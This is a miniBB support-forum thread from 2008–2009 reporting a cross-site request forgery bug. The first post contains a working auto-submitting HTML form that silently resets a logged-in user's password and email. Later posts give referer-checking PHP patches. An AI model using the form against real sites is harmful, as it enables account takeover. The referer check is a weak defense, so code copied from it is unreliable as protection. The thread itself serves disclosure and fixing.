miniBB ® 

miniBB

®
Support Forums
  
 | Start | Register | Search | Statistics | File Bank | Manual |
Bugs miniBB Support Forums / Bugs /  
 

XSRF Vuln

 
Author Guest
~
#1 | Posted: 10 Dec 2008 09:22 
Someone is using this code to change users passwords by posting it on another site and using persuasive ways for users to click the link. Can we please add a function so the user has to re-type is old password to change it or something?

<body onLoad="Attack();">
<form name="Attacking" action="http://yourforum.com/index.php? " method="POST">
<input type="hidden" name="action" value="editprefs">
<input type="hidden" name="passwd" value="hacked">
<input type="hidden" name="passwd2" value="hacked">
<input type="hidden" name="email" value="hacked@gmail.com">
</form>

<script language="javascript">
<!--
function Attack()
{
document.Attacking.submit()
}
-->
</script>

Author Guest
~
#2 | Posted: 10 Dec 2008 09:32 
If you click the link this is what it reads.

Profile has been updated!, password changed, please sign in again on the main page

It should say, please type in your old password to change or something, Right?

Author Paul
Lead Developer 
#3 | Posted: 10 Dec 2008 09:41 
It seems to proceed with that code, I must be logged in on forums, then I must go to some kind of other website which will update my profile that way.

If so, I'm not sure what is the purpose to ask user about his password again, if this code is possible to execute ONLY if user has been logged in on the site already?

Anyway, we will think about it... thanks.

Author Guest
~
#4 | Posted: 10 Dec 2008 09:41 
I was just looking at this and was wondering. Couldn't you just add another field to the form editprefs saying:

* Old Password
(Only necessary if you change your password)

Then change the function so if its the password they are changing the old password is checked first?

Author Paul
Lead Developer 
#5 | Posted: 10 Dec 2008 09:44 
Yes, we could implement it in the upcoming version.

Author Guest
~
#6 | Posted: 10 Dec 2008 09:45 
I just tested this out and it works. The user has to be logged in, if they weren't they couldn't read the link (unless you use non-registered viewing). The malicious user creates a page with that attack form and then posts the link on the forum. So every user (logged in) that checks that topic and clicks the link has his password changed.

I've disabled hyperlinks for now but they can still use the PM system.

Author Guest
~
#7 | Posted: 10 Dec 2008 09:48 
Paul:
Yes, we could implement it in the upcoming version.
Anyway we can get a quicker fix? This can be highly annoying especially if its posted on a hacker site.

Author Paul
Lead Developer 
#8 | Posted: 11 Dec 2008 05:05 
There could be one solution which I think should work in all such cases (and not only for changing the password under profile - actually with such JavaScript you could submit *any* action if user is logged in).

I have thought to put it for a long time in miniBB, but I'm just not sure if it would work and if it's not possible to hack in.

Try this: modify index.php file and after the line which says

include ($clonePath.'setup_options.php');
put this code:

if(isset($_POST) and sizeof($_POST)>0){
if(substr_count(strtolower($_SERVER['HTTP_REFERER']), strtolower($main_url))==0){
die('Sorry, it seems like an intrusion attempt or your server doesn\'t support referrers!');
}
}
Let me know if you still could repeat this bug...

Author Guest
~
#9 | Posted: 11 Dec 2008 08:38 
You the man, that worked. This is what I saw after the change.

<html><head></head><body>Sorry, it seems like an intrusion attempt or your server doesn't support referrers!</body></html>

Author Guest
~
#10 | Posted: 8 Jan 2009 12:28 
hey guys, thanks for this tip.
another fix i found is to do this...

it prevents any changes to the profile settings without proper referral information.

in the bb_func_editprf.php file, find this:

if (!defined('INCLUDED776')) die ('Fatal error.');

and right below it, place:

if(isset($_POST) and sizeof($_POST)>0){
if(substr_count(strtolower($_SERVER['HTTP_REFERER']), strtolower($main_url))==0){
die('Sorry, it seems like an intrusion attempt or your browser doesn\'t support referrers');
}
}

Author Paul
Lead Developer 
#11 | Posted: 9 Jan 2009 03:18 
What you suggest will only work for the specific case regarding profile update.

However with such kind of hack you may actually post any vulnerable information to other sections as well. So I think it would be much better just to prevent from posting from external sites for all actions.

My first suggestion also needs an improvement regarding some specific cases, it all will be available in the new miniBB version released next week.

Bugs miniBB Support Forums / Bugs /
 XSRF Vuln
 Share Topic's Link

Your Reply Click this icon to move up to the quoted message


  ?
Post as a Guest, leaving the Password field blank. You could also enter a Guest name, if it's not taken by a member yet. Sign-in and post at once, or just sign-in, bypassing the message's text.


Before posting, make sure your message is compliant with forum rules; otherwise it could be locked or removed with no explanation.

 

 
miniBB Support Forums Powered by Forum Software miniBB ® Home  Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contact Us
Check out the Captcha add-on: protect your miniBB-forums from the automated spam and flood.


  ⇑